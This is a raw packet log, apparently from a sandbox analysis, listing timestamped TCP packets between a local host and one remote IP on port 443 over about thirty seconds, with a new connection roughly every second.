Apr 25, 2024 14:21:57.749187946 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.749380112 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.749440908 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.749492884 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.749505997 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.753369093 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.753465891 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.754081011 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.754179955 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.754430056 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.754498959 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.565484047 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.565570116 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.565677881 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.566164970 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.566190958 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.987351894 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.987544060 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.987559080 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.987657070 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.987662077 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.989134073 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.989203930 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.989722013 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.989849091 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:58.989897013 CEST	443	49728	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:58.989954948 CEST	49728	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:59.920968056 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:59.921020031 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:59.921093941 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:59.921588898 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:59.921598911 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.336890936 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.337348938 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:00.337372065 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.337436914 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:00.337441921 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.339063883 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.339194059 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:00.340522051 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:00.341751099 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.341787100 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:00.341793060 CEST	443	49729	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:00.341869116 CEST	49729	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.364527941 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.364553928 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.364619017 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.364998102 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.365019083 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.780209064 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.780344009 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.780359030 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.780443907 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.780447960 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.785083055 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.785151005 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.785665035 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.785768986 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:01.785870075 CEST	443	49730	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:01.785921097 CEST	49730	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.551814079 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.551872969 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.555242062 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.555540085 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.555563927 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.969754934 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.979211092 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.979227066 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.979518890 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.979525089 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.980993032 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.981178045 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.991734028 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.991893053 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.991988897 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:02.991997004 CEST	443	49731	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:02.992029905 CEST	49731	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:03.828738928 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:03.828774929 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:03.828845978 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:03.829194069 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:03.829217911 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.254409075 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.254947901 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:04.254961967 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.254991055 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:04.254996061 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.256522894 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.257050037 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:04.257050037 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:04.257245064 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.257271051 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:04.257280111 CEST	443	49732	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:04.257306099 CEST	49732	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.119143963 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.119194984 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.119333982 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.119910955 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.119925976 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.533984900 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.534187078 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.534212112 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.534373999 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.534379959 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.535861015 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.535938978 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.536601067 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.536782980 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.536797047 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:05.536803007 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.744126081 CEST	443	49733	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:05.744303942 CEST	49733	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.570523024 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.570564032 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.570748091 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.571290970 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.571305990 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.985131025 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.985301971 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.985327959 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.985450029 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.985455036 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.986913919 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.986987114 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.987660885 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.987797976 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:06.987827063 CEST	443	49734	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:06.987884045 CEST	49734	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:07.824768066 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:07.824816942 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:07.825005054 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:07.825678110 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:07.825694084 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.247075081 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.247320890 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:08.247342110 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.247474909 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:08.247479916 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.249260902 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.249345064 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:08.249891043 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:08.250034094 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:08.250056982 CEST	443	49735	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:08.250267982 CEST	49735	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.142119884 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.142211914 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.142319918 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.142829895 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.142859936 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.557909966 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.558074951 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.558126926 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.558183908 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.558197021 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.559663057 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.559746027 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.560220957 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.560317039 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:09.560384989 CEST	443	49737	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:09.560472012 CEST	49737	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.334222078 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.334280014 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.334378958 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.334762096 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.334778070 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.758213997 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.764431953 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.764456034 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.764513016 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.764518976 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.766000032 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.766073942 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.766587019 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.766716957 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:10.766762018 CEST	443	49740	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:10.766808033 CEST	49740	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.517179012 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.517216921 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.517462969 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.517848015 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.517863035 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.935851097 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.936050892 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.936083078 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.936148882 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.936155081 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.939718008 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.939791918 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.940390110 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.940550089 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:11.940742016 CEST	443	49741	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:11.940798998 CEST	49741	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:12.760077953 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:12.760124922 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:12.760196924 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:12.760759115 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:12.760773897 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.187395096 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.187664986 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:13.187680006 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.187846899 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:13.187853098 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.191852093 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.191925049 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:13.192604065 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:13.192697048 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:13.192759037 CEST	443	49742	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:13.192814112 CEST	49742	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.155388117 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.155472040 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.155556917 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.156074047 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.156121969 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.576886892 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.577111959 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.577157021 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.577203035 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.577219963 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.578298092 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.578372955 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.579118013 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.579220057 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:14.579282045 CEST	443	49743	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:14.579339027 CEST	49743	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:15.809710026 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:15.809752941 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:15.809839964 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:15.810375929 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:15.810385942 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.231390953 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.279115915 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.452020884 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.452090979 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.452156067 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.452168941 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.453350067 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.453437090 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.490830898 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.490979910 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:16.491070032 CEST	443	49744	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:16.491138935 CEST	49744	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:17.961894989 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:17.961924076 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:17.962255955 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:17.962776899 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:17.962789059 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.384627104 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.385178089 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:18.385188103 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.385385036 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:18.385390043 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.386465073 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.386533976 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:18.387357950 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:18.387491941 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.387537003 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:18.387547016 CEST	443	49745	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:18.387554884 CEST	49745	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.465704918 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.465753078 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.465853930 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.467040062 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.467053890 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.886123896 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.886339903 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.886359930 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.886449099 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.886456966 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.887811899 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.888139009 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.888391018 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.888513088 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.888535976 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:19.888540983 CEST	443	49746	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:19.888655901 CEST	49746	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:20.843728065 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:20.843776941 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:20.843843937 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:20.844546080 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:20.844558001 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.259108067 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.259310007 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:21.259336948 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.259505033 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:21.259511948 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.260584116 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.260716915 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:21.264353037 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:21.264481068 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.264529943 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:21.264535904 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.476125002 CEST	443	49747	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:21.480132103 CEST	49747	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.090418100 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.090475082 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.090536118 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.091039896 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.091058969 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.512429953 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.512692928 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.512722015 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.512773037 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.512779951 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.513818979 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.513871908 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.514458895 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.514559031 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:22.514596939 CEST	443	49748	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:22.514643908 CEST	49748	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.444513083 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.444565058 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.445415974 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.445921898 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.445938110 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.866627932 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.870841980 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.870872974 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.871196985 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.871203899 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.872338057 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.872517109 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.872904062 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.872904062 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:23.873064041 CEST	443	49749	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:23.874113083 CEST	49749	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.075807095 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.075840950 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.079977989 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.083812952 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.083841085 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.502420902 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.503992081 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.504014015 CEST	443	49750	193.228.196.69	192.168.2.7
